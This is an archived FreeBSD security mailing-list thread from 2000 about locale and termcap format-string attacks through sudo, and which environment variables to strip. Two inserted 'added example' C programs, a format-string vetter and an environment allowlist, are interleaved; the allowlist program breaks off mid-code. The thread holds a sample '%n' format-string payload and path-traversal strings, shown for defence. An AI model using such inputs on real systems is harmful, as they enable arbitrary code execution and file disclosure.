> That's why I asked for more specific details... So far I've not seen
> any.
>
> He's basically worried that someone could use the LC_* variables to
> exploit bugs in the locale code's lack of checking of %n arguments.

'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other
actions required.

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Thu Sep 7 14:39:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 48AC337B422; Thu, 7 Sep 2000 14:39:30 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA16649; Thu, 7 Sep 2000 14:39:30 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 14:39:30 -0700 (PDT)
From: Kris Kennaway
To: "Todd C. Miller"
Cc: Warner Losh, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009072126.e87LQuE12710@xerxes.courtesan.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Todd C. Miller wrote:

> In message
> so spake Kris Kennaway (kris):
>
> > Again, the problem here is with sudo, not with something that comes in
> > FreeBSD.
>
> How is this a sudo problem? Do you expect sudo to strip away the NLS
> env vars for you? This would not be unprecedented, as sudo already
> strips out LD_* and friends but breaking locales seems a bit dodgy.
>
> As I haven't seen the entire thread I'm clearly missing some info...

Non-setuid applications which use PATH_LOCALE (which isn't restricted by
libc since the application being run isn't setuid) can be pointed to a
user-supplied locale file, which might contain nasty strings like
formatting operators which could exploit a binary which doesn't handle
them properly. The net result is the user who has authority to sudo to a
user and run a non-privileged app can also run other code as that user.

Basically sudo is being used as a "poor man's setuid" which bypasses the
libc checks which would be in place to ignore the env variables if the
binary itself were setuid, so those checks need to be pushed down into
sudo itself.

The second problem is that a non-privileged app which can be told to get
its locale functions from an arbitrary dir (either using PATH_LOCALE, or
using ../../../ constructs in some variable which is used to construct a
path (which should probably be disallowed by libc anyway)) might be able
to read bits of files as the user being sudo'ed to.

Now, I haven't fully explored to what extent this is possible on FreeBSD -
I believe the first one is a problem if sudo is used on third party
applications, but I'm not sure if the second one is, i.e. whether we
disallow use of '/' in the appropriate locale variables.

Kris

-- 
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 14:40:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id CB0CC37B42C; Thu, 7 Sep 2000 14:40:31 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87Le3715994; Thu, 7 Sep 2000 15:40:03 -0600 (MDT)
Message-Id: <200009072140.e87Le3715994@xerxes.courtesan.com>
To: "Andrey A. Chernov"
Cc: Warner Losh, "Todd C. Miller", Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Fri, 08 Sep 2000 01:35:57 +0400." <20000908013556.A19114@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru>
Date: Thu, 07 Sep 2000 15:40:03 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <20000908013556.A19114@nagual.pp.ru>
so spake "Andrey A. Chernov" (ache):

> 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other
> actions required.

That seems pretty reasonable. I'll strip those out of the environment
in sudo 1.6.4.

 - todd

From owner-freebsd-security Thu Sep 7 14:43:20 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id D6A2637B424 for ; Thu, 7 Sep 2000 14:43:17 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id XAA01127; Thu, 7 Sep 2000 23:42:44 +0200 (MET DST)
Date: Thu, 7 Sep 2000 23:42:44 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: Warner Losh
Cc: freebsd-security@FreeBSD.ORG, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009072059.OAA05785@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Warner Losh wrote:

> In message "Vladimir Mencl, MK, susSED" writes:
> : The point is, that if I submitted an evil locale - especially, a locale
> : containing formatting strings with "%n"s, and generally with a lot of
> : weird formatting characters, I could potentially make that sudo-run
> : program execute arbitrary code provided by me - that's what the original
> : bugtraq advisory was about, and what I claim that with sudo can be
> : exploited on FreeBSD too.
>
> Ah. I see your point. This is a generic problem then. However, it
> is a problem with sudo (which is why I keep adding millert back to the
> list of CC'd people). It likely isn't a big problem for reasons I
> explained earlier. sudo isn't intended to be a bulletproof way to give
> users the ability to execute N listed commands, as many of those may
> have sub commands. Todd can take a stand on this more accurately.

I had always considered sudo such a tool. Unless you explicitly allow
variable command-line for the commands executed, only the exact arguments
specified on the command-line in the sudoers file may be passed.

With respect to the two most recent posts:

1) Yes, I'm worried about exploits using %n. That's what the original
   bugtraq post was worried about

2) Yes, the solution is that sudo must strip the NLS variables.
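The point Vladimir makes here, and Kris and Warner made earlier in the thread, is that a format string read from a user-controlled locale file or message catalog cannot be handed to printf(3) as-is. What follows is an added example, not part of anyone's message and not sudo's or FreeBSD's libc code: the check a program or catalog loader can apply before using such a string. The untrusted string must carry exactly the conversions of the program's own built-in string, in the same order, and %n is refused outright; this is the same rule gettext's msgfmt --check enforces on translations. The catalog strings in main() are constructed for the demonstration.

```c
/*
 * Added example: vetting a printf-style format string that came from an
 * untrusted source (a user-supplied locale file or message catalog) before
 * the program uses it.  Not sudo's or FreeBSD's code.  The untrusted string
 * must use exactly the conversions of the program's built-in string, in the
 * same order, and %n is refused no matter what.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_SPECS 16

/*
 * Record the conversion letter of every %-directive in fmt into specs[].
 * Returns the count, or -1 when the string is malformed (dangling '%',
 * unknown conversion), uses %n, or uses '*' / positional "n$" forms that
 * this simple checker deliberately does not model.
 */
static int collect_specs(const char *fmt, char specs[], int max)
{
    int n = 0;

    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                  /* "%%" is a literal percent sign */
            continue;
        /* skip flags, field width, precision and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0' || *p == '*' || *p == '$')
            return -1;
        if (*p == 'n')                  /* %n writes memory: never from data */
            return -1;
        if (strchr("diouxXeEfFgGaAcsp", *p) == NULL)
            return -1;                  /* not a conversion we know */
        if (n >= max)
            return -1;
        specs[n++] = *p;
    }
    return n;
}

/*
 * true when `untrusted` may stand in for `trusted` as a format string:
 * same directives, same order, nothing the program never supplies an
 * argument for.
 */
bool format_matches(const char *trusted, const char *untrusted)
{
    char a[MAX_SPECS], b[MAX_SPECS];
    int na = collect_specs(trusted, a, MAX_SPECS);
    int nb = collect_specs(untrusted, b, MAX_SPECS);

    if (na < 0 || nb < 0 || na != nb)
        return false;
    return memcmp(a, b, (size_t)na) == 0;
}

/* Use the catalog string when it passes, otherwise fall back to the built-in. */
const char *pick_format(const char *builtin, const char *from_catalog)
{
    return format_matches(builtin, from_catalog) ? from_catalog : builtin;
}

int main(void)
{
    /* Constructed catalog entries: one is a plain translation, the other
     * smuggles in extra reads and a %n write. */
    const char *builtin = "%s: cannot open %s\n";
    const char *good    = "%s: impossible d'ouvrir %s\n";
    const char *bad     = "%s: %x %x %x %n\n";

    printf("translation accepted: %s", pick_format(builtin, good));
    printf("hostile entry replaced by: %s", pick_format(builtin, bad));
    return 0;
}
```

The checker is strict on purpose: translations that legitimately reorder arguments with "n$" forms are rejected along with hostile ones, which is the right default for a loader that has no other way to tell them apart; a catalog that needs reordering can be validated once at install time instead.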
Vladimir Mencl

From owner-freebsd-security Thu Sep 7 14:45: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E983D37B422; Thu, 7 Sep 2000 14:45:01 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39175; Thu, 7 Sep 2000 15:44:58 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06367; Thu, 7 Sep 2000 15:44:48 -0600 (MDT)
Message-Id: <200009072144.PAA06367@harmony.village.org>
To: Kris Kennaway
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: "Todd C. Miller", "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org
In-reply-to: Your message of "Thu, 07 Sep 2000 14:39:30 PDT."
References:
Date: Thu, 07 Sep 2000 15:44:48 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Kris Kennaway writes:
: Now, I haven't fully explored to what extent this is possible on FreeBSD -
: I believe the first one is a problem if sudo is used on third party
: applications, but I'm not sure if the second one is, i.e. whether we
: disallow use of '/' in the appropriate locale variables.

We already disallow this. You can't set your lang to be
../../../../../../etc/master.password, for example. If the LANG variable
has / in it, it is ignored. I think that's the only one that needs this
restriction.

Warner

From owner-freebsd-security Thu Sep 7 14:47:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 3AA8337B422; Thu, 7 Sep 2000 14:47:29 -0700 (PDT)
Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87Lknw19285; Fri, 8 Sep 2000 01:46:49 +0400 (MSD) (envelope-from ache)
Date: Fri, 8 Sep 2000 01:46:47 +0400
From: "Andrey A. Chernov"
To: "Todd C. Miller"
Cc: Warner Losh, Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000908014646.A19231@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200009072140.e87Le3715994@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 03:40:03PM -0600
Organization: Biomechanoid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 07, 2000 at 03:40:03PM -0600, Todd C. Miller wrote:
> In message <20000908013556.A19114@nagual.pp.ru>
> so spake "Andrey A. Chernov" (ache):
>
> > 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other
> > actions required.
>
> That seems pretty reasonable. I'll strip those out of the environment
> in sudo 1.6.4.

Speaking outside of locale/nls area, 'sudo' *must* internally
setenv TERMCAP /usr/share/misc/termcap
too, for the same reasons. Grep 'issetugid' through libraries is your
friend.

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Thu Sep 7 14:50:47 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 341D937B422; Thu, 7 Sep 2000 14:50:45 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LoDm26973; Thu, 7 Sep 2000 15:50:13 -0600 (MDT)
Message-Id: <200009072150.e87LoDm26973@xerxes.courtesan.com>
To: "Andrey A. Chernov"
Cc: "Todd C. Miller", Warner Losh, Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Fri, 08 Sep 2000 01:46:47 +0400." <20000908014646.A19231@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru>
Date: Thu, 07 Sep 2000 15:50:13 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <20000908014646.A19231@nagual.pp.ru>
so spake "Andrey A. Chernov" (ache):

> Speaking outside of locale/nls area, 'sudo' *must* internally
> setenv TERMCAP /usr/share/misc/termcap
> too, for the same reasons. Grep 'issetugid' through libraries is your
> friend.

That's way too platform specific; clearing TERMCAP (as well as
TERMPATH and TERMINFO) if it begins with a '/' would make more sense.

 - todd

From owner-freebsd-security Thu Sep 7 14:52:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8662C37B424; Thu, 7 Sep 2000 14:52:46 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39241; Thu, 7 Sep 2000 15:52:45 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06531; Thu, 7 Sep 2000 15:52:35 -0600 (MDT)
Message-Id: <200009072152.PAA06531@harmony.village.org>
To: "Todd C. Miller"
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: "Andrey A. Chernov", Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
In-reply-to: Your message of "Thu, 07 Sep 2000 15:50:13 MDT." <200009072150.e87LoDm26973@xerxes.courtesan.com>
References: <200009072150.e87LoDm26973@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru>
Date: Thu, 07 Sep 2000 15:52:35 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200009072150.e87LoDm26973@xerxes.courtesan.com> "Todd C. Miller" writes:
: In message <20000908014646.A19231@nagual.pp.ru>
: so spake "Andrey A. Chernov" (ache):
:
: > Speaking outside of locale/nls area, 'sudo' *must* internally
: > setenv TERMCAP /usr/share/misc/termcap
: > too, for the same reasons. Grep 'issetugid' through libraries is your
: > friend.
:
: That's way too platform specific; clearing TERMCAP (as well as
: TERMPATH and TERMINFO) if it begins with a '/' would make more sense.

If it has a '/' in it, don't you mean?
"../../../../../../../../../../../home/imp/bad-thing" is effectively
an absolute path.

Warner

From owner-freebsd-security Thu Sep 7 14:57:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 2EA4D37B423; Thu, 7 Sep 2000 14:57:24 -0700 (PDT)
Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87LuaZ19378; Fri, 8 Sep 2000 01:56:36 +0400 (MSD) (envelope-from ache)
Date: Fri, 8 Sep 2000 01:56:34 +0400
From: "Andrey A. Chernov"
To: "Todd C. Miller"
Cc: Warner Losh, Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000908015631.A19316@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200009072150.e87LoDm26973@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 03:50:13PM -0600
Organization: Biomechanoid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 07, 2000 at 03:50:13PM -0600, Todd C. Miller wrote:
> In message <20000908014646.A19231@nagual.pp.ru>
> so spake "Andrey A. Chernov" (ache):
>
> > Speaking outside of locale/nls area, 'sudo' *must* internally
> > setenv TERMCAP /usr/share/misc/termcap
> > too, for the same reasons. Grep 'issetugid' through libraries is your
> > friend.
>
> That's way too platform specific; clearing TERMCAP (as well as
> TERMPATH and TERMINFO) if it begins with a '/' would make more sense.

Clearing all (or resetting TERMCAP as I suggest) must be done in any case,
not only if it begins with '/'. The reason is simple - an intruder can supply
a bad entry (%-infected) directly in the TERMCAP variable.

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Thu Sep 7 14:59:58 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 2403D37B422; Thu, 7 Sep 2000 14:59:53 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LxO816950; Thu, 7 Sep 2000 15:59:24 -0600 (MDT)
Message-Id: <200009072159.e87LxO816950@xerxes.courtesan.com>
To: Warner Losh
Cc: "Todd C. Miller", "Andrey A. Chernov", Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Thu, 07 Sep 2000 15:52:35 MDT." <200009072152.PAA06531@harmony.village.org>
References: <200009072150.e87LoDm26973@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072152.PAA06531@harmony.village.org>
Date: Thu, 07 Sep 2000 15:59:24 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200009072152.PAA06531@harmony.village.org>
so spake Warner Losh (imp):

> If it has a '/' in it, don't you mean?
> "../../../../../../../../../../../home/imp/bad-thing" is effectively
> an absolute path.

No, neither the BSD libtermcap nor ncurses follow relative paths.
This makes sense since there's no reason why '/' wouldn't be valid
in a termcap entry which TERMCAP can contain. The TERMPATH and
TERMINFO variables are different in that they only contain pathnames
and so can be stripped out with extreme prejudice ;-)

 - todd

From owner-freebsd-security Thu Sep 7 15: 4:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 93AC637B422; Thu, 7 Sep 2000 15:04:05 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87M2su28507; Thu, 7 Sep 2000 16:02:54 -0600 (MDT)
Message-Id: <200009072202.e87M2su28507@xerxes.courtesan.com>
To: "Andrey A. Chernov"
Cc: "Todd C. Miller", Warner Losh, Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Fri, 08 Sep 2000 01:56:34 +0400." <20000908015631.A19316@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com> <20000908015631.A19316@nagual.pp.ru>
Date: Thu, 07 Sep 2000 16:02:54 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <20000908015631.A19316@nagual.pp.ru>
so spake "Andrey A. Chernov" (ache):

> Clearing all (or resetting TERMCAP as I suggest) must be done in any case,
> not only if it begins with '/'. The reason is simple - intruder can supply
> bad entry (%-infected) directly in the TERMCAP variable.

Sorry, I don't buy it. '%' is a perfectly fine (and common) thing to
find in a termcap entry. If you have code that behaves poorly only on
termcap entries with '%' in them you've got serious problems...

 - todd

From owner-freebsd-security Thu Sep 7 15:13:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 3872C37B422; Thu, 7 Sep 2000 15:13:43 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id AAA01306; Fri, 8 Sep 2000 00:13:22 +0200 (MET DST)
Date: Fri, 8 Sep 2000 00:13:21 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: "Andrey A. Chernov"
Cc: "Todd C. Miller", Warner Losh, Kris Kennaway, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <20000908014646.A19231@nagual.pp.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Andrey A. Chernov wrote:

> On Thu, Sep 07, 2000 at 03:40:03PM -0600, Todd C. Miller wrote:
> > In message <20000908013556.A19114@nagual.pp.ru>
> > so spake "Andrey A. Chernov" (ache):
> >
> > > 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other
> > > actions required.
> >
> > That seems pretty reasonable. I'll strip those out of the environment
> > in sudo 1.6.4.
>
> Speaking outside of locale/nls area, 'sudo' *must* internally
> setenv TERMCAP /usr/share/misc/termcap
> too, for the same reasons. Grep 'issetugid' through libraries is your
> friend.

Yeah, that was a really interesting search:

vlada@dual:/ftp/pub/FreeBSD/branches/-current/src/lib$find . -name \*.c | xargs grep issetugid
./libc/db/btree/bt_open.c: if (issetugid() == 0)
./libc/gen/glob.c: issetugid() != 0 ||
./libc/locale/setlocale.c: && !issetugid()
./libc/locale/setrunelocale.c: && !issetugid()
./libc/net/res_init.c: if (issetugid() == 0 && (cp = getenv("LOCALDOMAIN")) != NULL) {
./libc/net/res_init.c: if (issetugid())
./libc/net/res_query.c: if (issetugid())
./libc/nls/msgcat.c: || issetugid()
./libc/stdio/tempnam.c: if (issetugid() == 0 && (f = getenv("TMPDIR"))) {
./libc/stdtime/localtime.c: if (name != NULL && issetugid() != 0)
./libedit/el.c: if (issetugid() == 0 && (tty = getenv("DEBUGTTY")) != NULL) {
./libedit/el.c: if (issetugid() != 0 || (ptr = getenv("HOME")) == NULL)
./libncurses/termcap.c: if (issetugid())

What I see immediately:

locales, and message catalogs, we already know about them.
file globbing ...
HOME is ignored, home from the passwd entry is used
the resolver - env vars LOCALDOMAIN, RES_OPTIONS, HOSTALIASES
tempnam.c : ? even the TMPDIR ?
DEBUGTTY ?
termcap
the btree code is also concerned about the TMPDIR - when setugid, ignore it, and use /tmp

Yeah, it looks like that sudo & friends should be discarding all
environment discarded anywhere after an issetugid.

Looks like this is all - for the base system.

Maybe, there should be a system-wide list of env vars not to be passed
to programs running with elevated privileges....

The problem is rather generic, the cause is that a setugid program
executes another program at the elevated privilege level, but does not
transfer the "issetugid" flag. IMHO.

Vladimir Mencl

From owner-freebsd-security Thu Sep 7 15:16:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id BD13937B42C; Thu, 7 Sep 2000 15:16:25 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87MFtQ24652; Thu, 7 Sep 2000 16:15:55 -0600 (MDT)
Message-Id: <200009072215.e87MFtQ24652@xerxes.courtesan.com>
To: "Vladimir Mencl, MK, susSED"
Cc: "Andrey A. Chernov", "Todd C. Miller", Warner Losh, Kris Kennaway, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Fri, 08 Sep 2000 00:13:21 +0200."
References:
Date: Thu, 07 Sep 2000 16:15:55 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sudo already discards the following:

	IFS
	LOCALDOMAIN
	RES_OPTIONS
	HOSTALIASES
	LD_*
	_RLD*
	SHLIB_PATH
	LIBPATH
	KRB_CONF
	KRB5_CONFIG
	ENV
	BASH_ENV

 - todd

From owner-freebsd-security Thu Sep 7 15:20:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B9CF37B43F; Thu, 7 Sep 2000 15:20:09 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA24042; Thu, 7 Sep 2000 15:20:09 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 15:20:08 -0700 (PDT)
From: Kris Kennaway
To: "Todd C. Miller"
Cc: "Vladimir Mencl, MK, susSED", "Andrey A. Chernov", Warner Losh, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009072215.e87MFtQ24652@xerxes.courtesan.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Todd C. Miller wrote:

> Sudo already discards the following:

This is taking the wrong approach. You can't hope to guess all of the
"magic" environment variables which have special meaning on all platforms
on which sudo may run and implement parallel restrictions in sudo.

For (a somewhat contrived) example, under Foonix, libc might read a
variable BREAK_TO_EDITOR_ON_EXEC which is ignored when setugid, but which
works otherwise (for "debugging purposes" or whatever). If sudo doesn't
filter this out, then users who can run 'sudo root safecommand' can also
edit any file on the system.

IMO, sudo (and all other similar "limited privilege" programs) needs to
take a positive filtering approach: disallow all variables by default,
except for those on a defined list of allowed variables for that
application.

Kris

-- 
In God we Trust -- all others must submit an X.509 certificate.
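As an added example, not Kris's or sudo's code, here is what the positive-filtering approach he proposes looks like when written down: the wrapper keeps only variables on an explicit allowlist and then applies a value check to the few that pass, so the locale, NLS, termcap and loader variables discussed in this thread, and any platform-specific "magic" variable nobody listed, are dropped by construction. TERMCAP, TERMPATH and TERMINFO are simply not on the list, which sidesteps the "begins with '/'" versus "always clear" question debated above. The allowlist contents, the per-variable value rules and the caller environment in main() are assumptions of this example.

```c
/*
 * Added example: environment sanitizing by positive filtering, as proposed
 * in the thread.  Not sudo's code.  Only variables on an explicit allowlist
 * survive, and the few that do are also checked by value, so anything the
 * wrapper author never thought of is dropped rather than passed through.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ENV 64

/*
 * Assumed allowlist for this example.  HOME and the shell are deliberately
 * absent: a wrapper should set those itself from the target user's passwd
 * entry rather than inherit the caller's values.
 */
static const char *const allowed[] = {
    "PATH", "TERM", "USER", "LOGNAME", "DISPLAY", "LANG", "TZ", NULL,
};

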